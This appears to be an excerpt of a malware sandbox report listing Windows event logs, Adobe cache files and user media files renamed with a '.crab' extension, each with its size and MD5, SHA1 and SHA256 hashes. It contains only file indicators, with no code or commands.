SHA1: 9328ac331e5dcac65889772861b254207eaf95fc
SHA256: c180f2d2971b9a339341ffa1f71f9b18cac76493c164a08145f12b1845eb3de9
False
c:\logs\application.evtx.crab 68.51 KB MD5: 7f90b5e902be2863777689a769f88902
SHA1: 934055c465c39ee05d15da254ee3448c0311f33d
SHA256: 8beb1755d81f0082aca6cfce52f3951f38695d0d1e361077459fd0ecf64d0a28
False
c:\logs\hardwareevents.evtx.crab 68.51 KB MD5: 7da8af571dd359da3037e99733fd30a1
SHA1: be189d2aebe95fbed314a5318ab261cffdd5559f
SHA256: 1f28d9dff31207c57b1aec8fc598fb6611abb7a82976c605db1c3d1812097255
False
c:\logs\internet explorer.evtx.crab 68.51 KB MD5: cb6678e12827cf1bae30038c8cf305fb
SHA1: 0069888f3f6270f00856845f3fb61cda6474a31b
SHA256: 112935506bc65e2dc36d55982dd218e50a43e93adf52acef16b5b65800fa80b7
False
c:\logs\key management service.evtx.crab 68.51 KB MD5: b7401d0e3515394855582e5fc95ab936
SHA1: 84b205b28b509304a3eca697f169e66bce2d32e3
SHA256: 648e0b0681921e7fa8221e7a8a23b127c41d56d0d08ee5c1856c3195e1b60865
False
c:\logs\microsoft-client-licensing-platform%4admin.evtx.crab 68.51 KB MD5: 4fed42d09e065ac03804d1a0a0dc5190
SHA1: fe9c318c8a7ee974f0583de5d8b6563365f9cb3b
SHA256: c2fe5405071cb378dd6a90e13efdfc24d908b893011f728e2713bb6da01b6b87
False
c:\logs\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.crab 68.51 KB MD5: 17c09ee76359d14e07a8ae404dd58df1
SHA1: 09aea001a99251236d67fe4729cb07742f35392c
SHA256: 840c31c3e0c3c1444304fb60bfedb017d080fe7e4b61d47352950f8b8f476fbd
False
c:\logs\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.crab 1.00 MB MD5: 100d32fff7745c5dbb210b272090795f
SHA1: f8e24fa1ed58c076b3aa1a68f51833484e80ccc4
SHA256: 146dc28ccc9cfdca73d3fb23ee7f0d50a1e67ef129893718125eaa4938294c7b
False
c:\logs\microsoft-windows-applocker%4exe and dll.evtx.crab 68.51 KB MD5: f46de226c7529c21bcc5e4f930076e20
SHA1: 649aa2ba08ac7197f6455bb37259ccbc5b4401c0
SHA256: 7930c069b149294f5244b2299fc566c26b27520717796b8f2a1f1cb6614230f9
False
c:\logs\microsoft-windows-applocker%4msi and script.evtx.crab 68.51 KB MD5: b5d014bd0046abae59437f455c7a788a
SHA1: 972282d62216fa1f38dd58891cbe571b73979143
SHA256: 1b75960982505d152232098790448609f6d41b31e856cc74b6b411cba30fad8d
False
c:\logs\microsoft-windows-applocker%4packaged app-deployment.evtx.crab 68.51 KB MD5: 62ff389996a2dc930b757b11ec79bcb2
SHA1: 96369f580091d3c0d5dc2768d462829d8ef5cc35
SHA256: 4d2103e6557508c94e3cf0f2a97dccc66e4ed0e5702c3523b82c8ab2771a6de2
False
c:\logs\microsoft-windows-applocker%4packaged app-execution.evtx.crab 68.51 KB MD5: 873dc5ef9125e0e7c7df4a474b2496eb
SHA1: a91a5de55ca7c6b52b72deb8dffaab0c236e1e3e
SHA256: 8776f3a125b7b6f4c4465c0021d7a79e70d9d8c4c5fbe4f697c8b9b46b4feaf1
False
c:\logs\microsoft-windows-appmodel-runtime%4admin.evtx.crab 68.51 KB MD5: cac745804ebd18c96f087c2b2a4eddc3
SHA1: 539624e8f8c13e908c2cc83f56d09ce298008569
SHA256: dd3b453db87701e76e4a9d44757e3b1fbd5bae6410c88eb0b6ce71df5bae9ce3
False
c:\logs\microsoft-windows-appreadiness%4admin.evtx.crab 68.51 KB MD5: 97e17c67703bec8ab6e82b7416bc9781
SHA1: 50617af7d9ced15e7c233919bbb79d6d415c314c
SHA256: 0a600a7116661203ddf590e24f4fc2af7b2b8315054bab2b589a113e47b5fb78
False
c:\logs\microsoft-windows-appreadiness%4operational.evtx.crab 1.07 MB MD5: 04414c2caa00cf8ca7e03bde0b8770fa
SHA1: 8f6f3d453a41d36fc884e4f46b9b022966521bb4
SHA256: 8acfcab56cf0607d0ee7776dbd37f517dd691a01bc537b493d271e617eada152
False
c:\logs\microsoft-windows-appxdeployment%4operational.evtx.crab 68.51 KB MD5: ef5b55329591834bfda001af69a2dd16
SHA1: 56572d83769b80a1ea10d1c6c0fb95856b91e5fe
SHA256: 410f5541febd8bfac6ef4b1bb68125fdac7a381077efd510332608d10eb500ba
False
c:\logs\microsoft-windows-appxdeploymentserver%4operational.evtx.crab 2.07 MB MD5: a8285003ba67f3f6b7865800aa381047
SHA1: 8261e9d1e96779bee2b17ac1a27e4e39c89986d1
SHA256: bc876f007cdbebfa5bbaa748fb35fdfc145ae1140a971aaa1789f3e177879143
False
c:\logs\microsoft-windows-appxdeploymentserver%4restricted.evtx.crab 68.51 KB MD5: 188d95b7dce334c7e8cdc2e5af7f1ddb
SHA1: 34e603fd4aea9d1c0fa9836494e8a875762252e8
SHA256: 211856bb5861d4bbba4b2eec9c6799e2efb4007a403a79a2e506b2f99b867ee6
False
c:\logs\microsoft-windows-appxpackaging%4operational.evtx.crab 68.51 KB MD5: 658c415406ad215d9bc349241f0bd53c
SHA1: 244649cd32be6e7eb3b8d8ca149cac0bf73a273f
SHA256: 7f2b042b507687f725b40bbcc1c61d95b59de78aa2d945884099ebce11a4d816
False
c:\logs\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.crab 68.51 KB MD5: b9950850ff73e267527705b44fb81b03
SHA1: 811d5d12d664dcd39e2688cabf921ebe3ef61a59
SHA256: 34915130bce0fbe0344e125a55237e894a12b0968272d1002fae61b1138a68c8
False
c:\logs\microsoft-windows-bits-client%4operational.evtx.crab 68.51 KB MD5: 627165bc248e033c1dfce99c543a4a3c
SHA1: 96c786bfa9aaf95ae589fc40458ba0f993ee0a3a
SHA256: 4b5c36a8b1972837835307294c674266e5609ac62f4fa1adc5be786d23152a09
False
c:\logs\microsoft-windows-codeintegrity%4operational.evtx.crab 68.51 KB MD5: 3610aba1557d95f929bdd9ec1c555b2c
SHA1: 57f1787e1653643f077a47c80012f3466ad1b305
SHA256: 1584132ca98fb5db5cd1a8fe3e7630521c824e02819616e02267e65ecb79fa49
False
c:\logs\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.crab 68.51 KB MD5: 637772da2b4ba9485becb248ee19703c
SHA1: f5b3975c0553c60fa9994b8414f4a2676a9869c0
SHA256: 0555e09ed80d910d45a61a259511050ca70dba2a7cd612d4d19560be87e10200
False
c:\logs\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.crab 68.51 KB MD5: 88a48ff0d133400852af06e94f9ed661
SHA1: 664509e402a27c1cd4fbb8c1f44a72f14c5b7910
SHA256: 52c402a361e481eb3b6ffbc894db470980101dc5656f133d0210126a1acc7a61
False
c:\logs\microsoft-windows-crypto-dpapi%4operational.evtx.crab 68.51 KB MD5: 2473eddd5c7f45a0d8095c2216bd619c
SHA1: 5f76b91e3bf0b5108ab0bcc64ef9e70094bdb394
SHA256: 98d7865e116f5fbdc26a6803f282d2c6b90856b28ac026861c990fcc1b1e8190
False
c:\logs\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.crab 1.00 MB MD5: 93660431b7ea31e96ef829a9ce4d0503
SHA1: ed9d16cf5ac7dbe1e111c89083b738e5ae7e2db9
SHA256: 9019f59b60b90c330462984ae88c18cbed629602a7e0d4c09ada8879865390f0
False
c:\logs\microsoft-windows-devicesetupmanager%4admin.evtx.crab 68.51 KB MD5: d9fc2ec04c5d4704e059273780e0c4bc
SHA1: 541a3c7d52232c07cf778785ef35c7d07bc0c991
SHA256: 41d5c4ccedcf87e6b336487fe01b3094eea7333e98cdbf332152dbdcc383b182
False
c:\logs\microsoft-windows-devicesetupmanager%4operational.evtx.crab 68.51 KB MD5: aa384fd8086d7f5b9240b006b7ff3c3b
SHA1: b4c263e038d17c17b61b2c3e9acc1c0b0101fc1d
SHA256: 5143d1bc745fab0d976bb2f04bf467fca715cf3570c718f1231fe6fa8c04afd9
False
c:\logs\microsoft-windows-dhcp-client%4admin.evtx.crab 68.51 KB MD5: b9015f2350a863f5dcc8242d5de56d99
SHA1: 314a7676fde8e6bc6f0ded9b444eea7ca5f4b19f
SHA256: 116f3b734a49a01eb41973fcfb2cedcbd18b1029a812dff521d941063e32cf9a
False
c:\logs\microsoft-windows-dhcpv6-client%4admin.evtx.crab 68.51 KB MD5: a162b352efb8c210251e101f430c6955
SHA1: 5deb21149ca50569d2a4a75f781490eb91fe537d
SHA256: 3ccb857efa0d15348d3de69ac505def244288947b12edcf4c287dd3e6ebe8dd8
False
c:\logs\microsoft-windows-diagnosis-dps%4operational.evtx.crab 68.51 KB MD5: 04ebde9e2bb7c86b8679f973421863de
SHA1: a62187abed0dc735eb4204ca97cd67751329ef4a
SHA256: 3b04267fbc30eaf4ac08d6bd7481a96c11dfa740ee558db5e28ac8238cc71007
False
c:\logs\microsoft-windows-diagnostics-performance%4operational.evtx.crab 68.51 KB MD5: ed85f273d6602f98776086eba73d1bce
SHA1: d046792142e289d20286e6b57bc783d92e18980c
SHA256: 06aba96d487bc33cfe269594a37c361ceebf40af0088e53a96b951bf2441640b
False
c:\logs\microsoft-windows-grouppolicy%4operational.evtx.crab 68.51 KB MD5: 8df1a9385f65fdb314ab900d6548ff34
SHA1: 30015db80547bf0fd65ccad32e61ece8ea85b764
SHA256: b4cb3dac4d17b8c87ade56aa2dd5543a6a5c2c2226065e98f140f8609706b821
False
c:\logs\microsoft-windows-hotspotauth%4operational.evtx.crab 68.51 KB MD5: 4fc959f1bdb2fb0d8f217c6f759e8a15
SHA1: 4e555d147520df4834543cc11617bfe8813dbb3d
SHA256: c4a230cbd3da14526773a600651ac36b3e07352198892e23508071b5df33571f
False
c:\logs\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.crab 68.51 KB MD5: 0bf1b607a4fcfcac2a9d829bd64371e8
SHA1: 9fade27942ce94bf0d9ead56e55c241362065bb8
SHA256: bb8ae8c49185edfbed634e6022b9bfe37c307559dc72ab5e4228228249c1473a
False
c:\logs\microsoft-windows-international%4operational.evtx.crab 68.51 KB MD5: ed64b3dcfd9322d3a1cd133c847729f7
SHA1: 204c560c5687784dfa9dc9c0ff278a0ae557e7af
SHA256: 6ba9974bb9dac3f247b6b3c662da8d9a2e599e838f7fe7a9eda8898aa780452c
False
c:\logs\microsoft-windows-kernel-boot%4operational.evtx.crab 68.51 KB MD5: 67adad2ca2d808ad1391e362da0bda53
SHA1: 3886f312c77fe84a384eee3c647233daca1e86dd
SHA256: 5174eb6b4b92a74050e140d8a0da4f16638255e8472e60ab405e492f53ea6116
False
c:\logs\microsoft-windows-kernel-eventtracing%4admin.evtx.crab 68.51 KB MD5: 8defb5b51bc67eb2d4b7781106a62259
SHA1: cdefb1c73921be197d582594b07433a310610ef6
SHA256: 7b7233a1320252be2808c196a85fc18dc39dbcedbea212f4b9de05a59eaccb11
False
c:\logs\microsoft-windows-kernel-pnp%4configuration.evtx.crab 1.00 MB MD5: bfe61045b4f881cb2b4f5912f6aa8a34
SHA1: 40853247055406a59178b0ef5fc028b945d225c5
SHA256: 17fbb304e17bd84d29196383c026159ec1149480311ea78511267242894f4bbc
False
c:\logs\microsoft-windows-kernel-power%4thermal-operational.evtx.crab 68.51 KB MD5: 84fb2f0edb38f3453a4bc9fc095a16f1
SHA1: b06884ba6e69f988d1afe3dd738cb101e4282af4
SHA256: 9b68c5cc08a322d3f351c285a3581b122dbdfa3ac00a3cf418d726fedc4f5acd
False
c:\logs\microsoft-windows-kernel-shimengine%4operational.evtx.crab 68.51 KB MD5: bd6f2f6ce4ae7426d6a364506322aa06
SHA1: c4f125f1cda906b8bffbfb180020cbcbf96ce845
SHA256: f32d27030db4eb486fa050928042e9ed692767a3b56e0fd150fb2671145d9bf9
False
c:\logs\microsoft-windows-kernel-storemgr%4operational.evtx.crab 68.51 KB MD5: 857020e0173ec53868c0099dfc115592
SHA1: ccdaea97eea807382db9f05b0e91b8b2eee77922
SHA256: be74fd4f76d19d9e457214799fe9597a6e27c55667c5a751a308cb423df1f47b
False
c:\logs\microsoft-windows-kernel-whea%4errors.evtx.crab 68.51 KB MD5: 05564a8976875199fdec356a7a44cd3a
SHA1: a5f0c3d5c3820af0e14bddb92dc7ee9d2ac3bb9d
SHA256: 66e703810db18800316d42e889ca1c5faecb3153fea3149a428da5d1059b9c01
False
c:\logs\microsoft-windows-kernel-whea%4operational.evtx.crab 68.51 KB MD5: 6a11892945e3c5d0cbb97f7a95ac175a
SHA1: cecf75639b7ee02622801fd0f81ea216b9840275
SHA256: 6fdac5cba09b717eb2eff7b839190b32dc24eff2298f0051f27b3db334184109
False
c:\logs\microsoft-windows-known folders api service.evtx.crab 68.51 KB MD5: 179dd6036962489ff8a85995de382c0a
SHA1: 5944301ad95ceefff8f2af6bdd8d2ffddc8293c9
SHA256: 84d2e69ae97a963af81041bda9641a696d586be80b84366128ea373add939809
False
c:\logs\microsoft-windows-liveid%4operational.evtx.crab 68.51 KB MD5: 24574045855021bff63b3211576943a8
SHA1: 311be5a994d93d907f4c1f444ef1edf0c31d705f
SHA256: c7b8c107b7f858ddec7e511e73b37960382fab33f6a1f9254c8085ce1b2d32ce
False
c:\logs\microsoft-windows-mui%4admin.evtx.crab 68.51 KB MD5: 2e35ae6ace8db3d4cc13e529a361a343
SHA1: b6fe6271cdd76d025bdc219c6456824da0bc7a02
SHA256: e70e8404801446c2213a1b7a313a9495e7afa9e3f11dc0eac9c54ef12a0e41b2
False
c:\logs\microsoft-windows-mui%4operational.evtx.crab 68.51 KB MD5: 8801d9fc8d9e2802865b316ac2588d1b
SHA1: 97646b779486106ae7257653c3915de96eac3f15
SHA256: 73de5d48de4393c1148667fbb361f3860217276e2adb89cd612c66151e432321
False
c:\logs\microsoft-windows-ncsi%4operational.evtx.crab 68.51 KB MD5: 6ef35c35c2f70156ec03b1a2500b95dc
SHA1: fc81ab22a038b778e221c73c9d2a2879f7a73f74
SHA256: 7d552fd59f53f6440ae106c6ffc3f4f539433259371b7bdd93e493f7617b1ca8
False
c:\logs\microsoft-windows-networkprofile%4operational.evtx.crab 68.51 KB MD5: 06a666ec48d42b1d6c2628aefe801e36
SHA1: aa3c8326512f5729ff40e0128725e501e5212022
SHA256: 1aff35d48939f70ce3e9929c051115527e8f7f412e1bc21db8b0c037a84e4290
False
c:\logs\microsoft-windows-ntfs%4operational.evtx.crab 68.51 KB MD5: 2c315ae780a6eef762f7d827f7d69ff8
SHA1: 2064b14d8000d585e2152b1e71a1f74a271cdcb5
SHA256: 154d09856e16b68cb6a5d5c622ed944dfc3f9b96c73c54a4fe6e491418b176f8
False
c:\logs\microsoft-windows-ntfs%4whc.evtx.crab 68.51 KB MD5: 8fa2758cd39784df01a0d23f21508ae6
SHA1: 4ac08dc6c693848b08279e39ad4ddaf3752cf3a5
SHA256: 4481bf22aef46bdd8102111693f69f1c77c5da50b29e3e2c02c4627f0fad68d5
False
c:\logs\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.crab 68.51 KB MD5: 1d6395b662449d98313ba8adfb20f09c
SHA1: d270bf96b277bbbf2cc8e5113d418036452dc976
SHA256: b6a0383d22d9ac4427bc715c4739f38be8669bdcc187138d25edc3e0afec1aea
False
c:\logs\microsoft-windows-readyboost%4operational.evtx.crab 68.51 KB MD5: b51fd7bc6029de9a3dec1ef5cc294cb0
SHA1: d0c84b08cab1e6f2b35bf03b7cac466701a9c72b
SHA256: 697fa1c5e66b530ae91c348f4c7f5fd7eece0cf43c636374dbdde1a5cd78f7ec
False
c:\logs\microsoft-windows-resource-exhaustion-detector%4operational.evtx.crab 68.51 KB MD5: f7221caf8bae1569101ae146d12de31a
SHA1: a3361a27f375d76c19b7010c3e68dbf74bc85527
SHA256: fa30adad0936029fff0c12f6a7bc534de024745549ae7219aabdc73127be94a1
False
c:\logs\microsoft-windows-settingsync%4debug.evtx.crab 1.00 MB MD5: 250b177a209a1ed220c140a8afa588a9
SHA1: 4d1b6d52409e3cdb2ed0cfc9765a8ce9bbcd6d8d
SHA256: 5cc66b08d22f3fc5fa3d80e557fb62efeff219c2dc456bf746723628ab3fad0a
False
c:\logs\microsoft-windows-settingsync%4operational.evtx.crab 68.51 KB MD5: ae28bcdb7b35f3e73997bdfd52dbd450
SHA1: a1ed47b3621bf9ecc8a9952cbceb8f5af3d42967
SHA256: d6a5b8e870726a64fd72ac47621d84905e2d8cb5d178887d8e76963fd943157a
False
c:\logs\microsoft-windows-shell-core%4actioncenter.evtx.crab 68.51 KB MD5: 0223718243dc59e31561ad77a6278165
SHA1: a512156acd466355022f41e3cc7d85099ff9a460
SHA256: ace8b180b065ab394adcbf79728c0fb67cd04eb2891fc7dc3d1d9c21b0ea940e
False
c:\logs\microsoft-windows-shell-core%4operational.evtx.crab 68.51 KB MD5: 19d8cba894fbb15558d4afee0b050bdc
SHA1: a73e45753fb200c2c420de1f35e8d7e0a7b6efcd
SHA256: 34e10bfa16be0366072ed6c8355f7ad398312d326d295ba7da95027febb178a9
False
c:\logs\microsoft-windows-smbclient%4connectivity.evtx.crab 68.51 KB MD5: 224afcb19fd5c371b6b1aef1e37eac3f
SHA1: c5051f5e69c8688f22ec84eb52d74ac87ff83d73
SHA256: 7bbba71b947c3cd3b7b68a0d7c586b06d212cf21a5e6603b5f2aabe2b93e9828
False
c:\logs\microsoft-windows-smbclient%4operational.evtx.crab 68.51 KB MD5: e16e5caf3c3edf749bea0c55cac272e7
SHA1: edd17f2f96e69d74a6e3656c928817e1433cdcc1
SHA256: 88e024313bbfb38a260ee4a4e767cec6f18c033ffec3293c7720bf999e0a5ca2
False
c:\logs\microsoft-windows-smbclient%4security.evtx.crab 68.51 KB MD5: 576a516a5550cb113202325e378e391f
SHA1: f8876bfec5755154431190396a71b9da2e1e58f2
SHA256: 9bf4dd097fe889d8a58553b7cd4f52c85e5c8844b4273f55dfd743bd1d7a1b3f
False
c:\logs\microsoft-windows-smbserver%4audit.evtx.crab 68.51 KB MD5: c03f22778f555f88763b9a42c6c30a22
SHA1: a35ce8d365b4b653088dc3ffa77b23f16678b343
SHA256: 7511391ac7a48074078f46e644fc081e7cedb67196b712feb348edca1c57bf19
False
c:\logs\microsoft-windows-smbserver%4connectivity.evtx.crab 68.51 KB MD5: b7ffc29ebfa9b64c0d252b329008ecac
SHA1: 28fbb0ece4c500452dc355c320045cfccb2414ed
SHA256: ce3d77102e590b84b20f78a3e3f31b542d2fb0e59999da0dd675a16527075ed6
False
c:\logs\microsoft-windows-smbserver%4operational.evtx.crab 68.51 KB MD5: edf1166cf3648afca4df64fff4d78762
SHA1: 969495b391d8eb247095366b94529fb37cb71bf7
SHA256: f2a15263de6d98ed50280e0683510d764cf7b917337726d7fecd7539e65e2677
False
c:\logs\microsoft-windows-smbserver%4security.evtx.crab 68.51 KB MD5: ae60a69864a0de9393631e7171b345b4
SHA1: be65961de1fc5e076855ba875aa1d83ebe2f4374
SHA256: 9749966d540864e5ef2660e66545ad44eaaac7447768ec9992bb2f4ced9148c4
False
c:\logs\microsoft-windows-store%4operational.evtx.crab 68.51 KB MD5: 53231c4af2509ffafdc14570a14fca24
SHA1: 9ee94ccd68e1d5d087ab82bcd81ac086d250671c
SHA256: efee6942763de0d44e4e0188fdb320f3457d0c293c76c99181c74a28eb64c3f4
False
c:\logs\microsoft-windows-taskscheduler%4maintenance.evtx.crab 68.51 KB MD5: 75a6b18883f1aead71213da97847599d
SHA1: 4606cb34be6fafacde13c24dffaa3ef10402d20e
SHA256: 1162d7b6e1d9f7eb2c329a65f221f7065150d18c5084e5f6240a94efd39378ad
False
c:\logs\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.crab 68.51 KB MD5: 25e75c8c597db6ffed8393a9e6fce999
SHA1: 564821a4aa4234b416b1e21a1c09243dcb1a189a
SHA256: 36d8084a1aa00ce971ece9f37dbeaca331219ce65e5ab6b3e1194917ca6a1d77
False
c:\logs\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.crab 68.51 KB MD5: 173e7ac8dd199692ed525e286c989819
SHA1: 5b3915f97822bef3c7b829aa41a1cf1774e4b095
SHA256: b217eb29561993a3fa31e0f6e49faec5f0a7e89eb09b91364762b37d8df2f76b
False
c:\logs\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.crab 68.51 KB MD5: af578cba4e6fbb8f1e3d0ddcbcfa8276
SHA1: e62487a547ffb35e0dda0c557a56a7a9e95c1578
SHA256: fdd13bad07a206e6da83a34f0338ac37467bc34dac4388533b91eb2df36d5f6c
False
c:\logs\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.crab 68.51 KB MD5: 6b63e72c28d3fa7e581ae752391de389
SHA1: f895ecc11afa3f1a18c65b85a326663116734191
SHA256: 994c1f73cffede23a419c9fe395a53652381ab8c38548778314f2eec981e7ae1
False
c:\logs\microsoft-windows-twinui%4operational.evtx.crab 68.51 KB MD5: bc58a50aecd8ca5b4a9b9d227baa9566
SHA1: bedc492732f9d6623ea89a3f03f17ee577944321
SHA256: d2313a47f6ee91e73a288b6a20b12e1090f3bfd3cea3cb34ddb73292179e24d4
False
c:\logs\microsoft-windows-user profile service%4operational.evtx.crab 68.51 KB MD5: 1c5726a0110505e607fb1f8910a96544
SHA1: 580ac71708182cb66280116f38e7718e57e228b8
SHA256: bae961f1f0219fd2b1f193de77dc0f09ebfd9a21689822b5c0a00438983d716d
False
c:\logs\microsoft-windows-userpnp%4actioncenter.evtx.crab 68.51 KB MD5: b4d3983b3fbbc1c4e8ef5728871ac8f6
SHA1: 20dfbeafa1622ad13205f871447cd24879031af8
SHA256: 647522124e1c1597036d8671e463ef752bd7d0e78bce8bf2f6de3e239920f99b
False
c:\logs\microsoft-windows-userpnp%4deviceinstall.evtx.crab 68.51 KB MD5: bd59a16033c007f1209e7352c6c17a43
SHA1: 23f45f84d87abddf80250600d7f63b165a07ac66
SHA256: a529e885b3370b67709193ecf139704e3bde9ab1187f0dbdadfb4d8e828ae71d
False
c:\logs\microsoft-windows-volumesnapshot-driver%4operational.evtx.crab 68.51 KB MD5: bc623ff38dfc389beeb59962756f8b51
SHA1: 640ea99e7267fb7c13d6f1b6a3fcf3283480e5ed
SHA256: 9e17f9c99fd965526186268da03b2703024bc7e3a17b063c8771feada7c75a25
False
c:\logs\microsoft-windows-wcmsvc%4operational.evtx.crab 68.51 KB MD5: 7217dcb5a65cf58612751fe279a1059a
SHA1: 60c9d7eed3d0e84f04437c67941ccfa4dc666735
SHA256: 514ee02ee15832d0a6d4243c762e913f3b0971676fbfe1ae617d5e4762588d60
False
c:\logs\microsoft-windows-windows defender%4operational.evtx.crab 68.51 KB MD5: f51edb2b8fccbf7c1ad9d6411ee541d1
SHA1: 47827d025a9ce34f107617c1d9115e1de5861083
SHA256: f27b3523c38c01fd1d9978acf25c592719bdb3ffa01c38bf082d920a47cc3edb
False
c:\logs\microsoft-windows-windows defender%4whc.evtx.crab 68.51 KB MD5: 5bcddf4e0e903b29664913331746719a
SHA1: 5934352df15fc0d1f4b2252c8ad4aede9155e71e
SHA256: 331e0daf493fcbd36056f0efe9815a38323c72e6dbca67b7479ffe40b92c0bf7
False
c:\logs\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.crab 68.51 KB MD5: 7b9769e0cabfe410eac07bc7fbef6186
SHA1: 73df11621ed4bbf720ce4867781bdf93c26f781d
SHA256: a5251bd3aaedaabaa80730dff0bf3890cd69cae0813629727afdbea26894beaf
False
c:\logs\microsoft-windows-windows firewall with advanced security%4firewall.evtx.crab 1.00 MB MD5: e9d048c075acd396b35f617d242b9c68
SHA1: 2de11ca0d2505b4660d6223ea71e5f848ac17cfe
SHA256: 6e305c266477f3aaea7e5af6d1d158814cc86ce9e56d79d56dee06fc87ba2dbb
False
c:\logs\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.crab 68.51 KB MD5: 3fa814ab96cf0ec92e3dfafea26ee016
SHA1: f923d20a054ed142594ea41ae1c3a108245980b2
SHA256: ac6dd799f54bc893d0064cc8afb67452f68e69770fb524c7f75b9b2135aed39d
False
c:\logs\microsoft-windows-winlogon%4operational.evtx.crab 68.51 KB MD5: 9ed8e4a513c163c36432d9350491fb02
SHA1: 126105c65974235563ab9865aefa937846a9ce63
SHA256: c9a9d2c75a2c170e03b2f33c007bffc5bebdbae1b9feac1d36c8fc959081841e
False
c:\logs\microsoft-windows-wmi-activity%4operational.evtx.crab 1.00 MB MD5: 34fd22406c472dd3f54b57a4f2783bfe
SHA1: 7c68ff886f739fa1e64b7e05aa686f815bb1f982
SHA256: 003378574a1513fdc20cbead5ede9c82b0619a1bba4d76b4eb818fb20cfef6e4
False
c:\logs\security.evtx.crab 1.07 MB MD5: 60bdf3b7bad53a224cd3fc0c2ec87a87
SHA1: 58e1004b804187bdb76795fc4e2acb931506459b
SHA256: 0d1500e165ad3c965df55ad790d18f8c9597949b24df8a6dddb2b7342d173f19
False
c:\logs\setup.evtx.crab 68.51 KB MD5: 692843ab9af214eeb5eebcadacbd7ee6
SHA1: fa752abe9a0de7c9dab50e9e5357981d1eca0062
SHA256: fc8045d94bf988037d77ec1a47f26459a2637ffd7b9f7d0ffe5aae9fb06813a0
False
c:\logs\system.evtx.crab 1.07 MB MD5: db7fcab9160616485817806cae1b1630
SHA1: ee0693e6fc274ae1f22e475f67108de7c61a5602
SHA256: e1e0d19d57f364d940b39f858b6983f658401fe149c452cbeb9dfffb925be195
False
c:\logs\windows powershell.evtx.crab 68.51 KB MD5: 07809453e791e629e8db38554712d1b7
SHA1: 846fe6c9097d502a1defd43a09e20387faee878c
SHA256: b000c2dfed304b753afb2f70846e79524cd9de695d66a58956d49c84fe487814
False
c:\users\fd1hvy\appdata\roaming\02qnh7-.m4a.crab 28.52 KB MD5: 67f02dca81fd958c624d674d53e42816
SHA1: c4f2c978c079dc3e252f0a03992b567c8ce0c8d2
SHA256: 4baeba1af944f9667fe327bbff70c91515fa3b9e1ec07a02b1570140c933a86e
False
c:\users\fd1hvy\appdata\roaming\2ounryia3zn9-w8ebm_.swf.crab 93.90 KB MD5: e94b6ab84f76c7d05a4eb3b2bda553ec
SHA1: 5895dfbd3bbc9cb4fa213e5b74e5309ab8c4e3d9
SHA256: a3b0a9fb83d903803a84fcefc259ca473e871c133e5e1254c64beadb90c06d7c
False
c:\users\fd1hvy\appdata\roaming\9b_eqebyn-_mwdpxc6.mp3.crab 55.10 KB MD5: 4fa6250c8edf4b3d3aae39e68281d97c
SHA1: a9ecdee8f1be05b03f40af176b62d115fc7c7ef0
SHA256: 609ed33c874a0f8ee8b3ce1e6622d2fa28d81f57f3273af0be70ff4f42a282dc
False
c:\users\fd1hvy\appdata\roaming\adobe\acrobat\dc\jscache\globdata.crab 0.54 KB MD5: 4a625eed9574d07dc5a48e532058d11d
SHA1: 1586e3323d232ad987e7686ba51f4bb2b90833f8
SHA256: ddf2419b1dc04d8ce06105b1d47844cfa50294a5ab9a89a7232cc8ba14191548
False
c:\users\fd1hvy\appdata\roaming\adobe\acrobat\dc\jscache\globsettings.crab 0.54 KB MD5: 11131b04c53a0a218a07a28400b711e4
SHA1: 6fc35c421b84e095e478e70f3148d657a8ecb106
SHA256: 4285c6873d53096ff9fb5789c8eab347ade04a91c1128dcd8383940d9fbbbfc8
False
c:\users\fd1hvy\appdata\roaming\adobe\acrobat\dc\security\addressbook.acrodata.crab 8.20 KB MD5: 9388cf6aaa98030f8f756f9b2c125717
SHA1: 2660241b8132681e3640d6b7a22f4e53bda3706d
SHA256: bef66c3594571a8478ad9d9c1358be62f01fa82247899daba7086e96430de599
False
c:\users\fd1hvy\appdata\roaming\adobe\acrobat\dc\security\crlcache\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl.crab 1.13 KB MD5: 9ec88a06223e8c24a5ebad30238687ae
SHA1: 50c9f0aa4875ae3f83cdc04e955f23ecad10d162
SHA256: e57ef8c1cb5e69700d98bc5d5410c66ee21d253a565515e659c6a978fcd0ad7f
False
c:\users\fd1hvy\appdata\roaming\adobe\acrobat\dc\security\crlcache\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl.crab 0.93 KB MD5: e7c0e01643f73bef2a252fa98a066072
SHA1: da383042b8a9ef9fa2f488e3b39b21054af409da
SHA256: 03c8950708b0c2dfd61bf383137bbc5338802430a1a9cec11039989b42e94b07
False
c:\users\fd1hvy\appdata\roaming\adobe\logtransport2\logtransport2.cfg.crab 0.73 KB MD5: 2d883d71dab7eae582dce322784d55a7
SHA1: 69bf69b09439d6395c4eb36ef64861ba41aebbf8
SHA256: 267ce1bd195ffe5c0ab81741b538bca3d8bdbc32fa35385117dfe7aa48ac66f9
False
c:\users\fd1hvy\appdata\roaming\adobe\sonar\sonar1.0\sonar_policy.xml.crab 18.84 KB MD5: 6fe9a4e2dab914d2615d77ed6dec0e52
SHA1: 9201124f995d333b106ea738ec9a9b3de971a0fd
SHA256: 1ab30607a398fa08cd5b5137e9f2cf8e7d3cb40076f2190c6e1a9750e0dec25f
False
c:\users\fd1hvy\appdata\roaming\agghfzyqqx.mp3.crab 85.51 KB MD5: 80c2371200fcaa6221fd6048db3aac4d
SHA1: 4f9c9a1ace16867c0e738de8fed4863a318e9c1c
SHA256: dd88460d06fc985ec666052c6904aa790eee6cd306c0eb574d46a1e3343deeca
False
c:\users\fd1hvy\appdata\roaming\ahwg4et.avi.crab 13.99 KB MD5: 5e4e5c052af1b4795b2ba2f535385600
SHA1: 66d30f246691bd423506ee25c6c6594b9c33adbe
SHA256: 8093f51ddf4d2eaea2374e714053444d00f368472de8ff56db74098d20414ed7
False
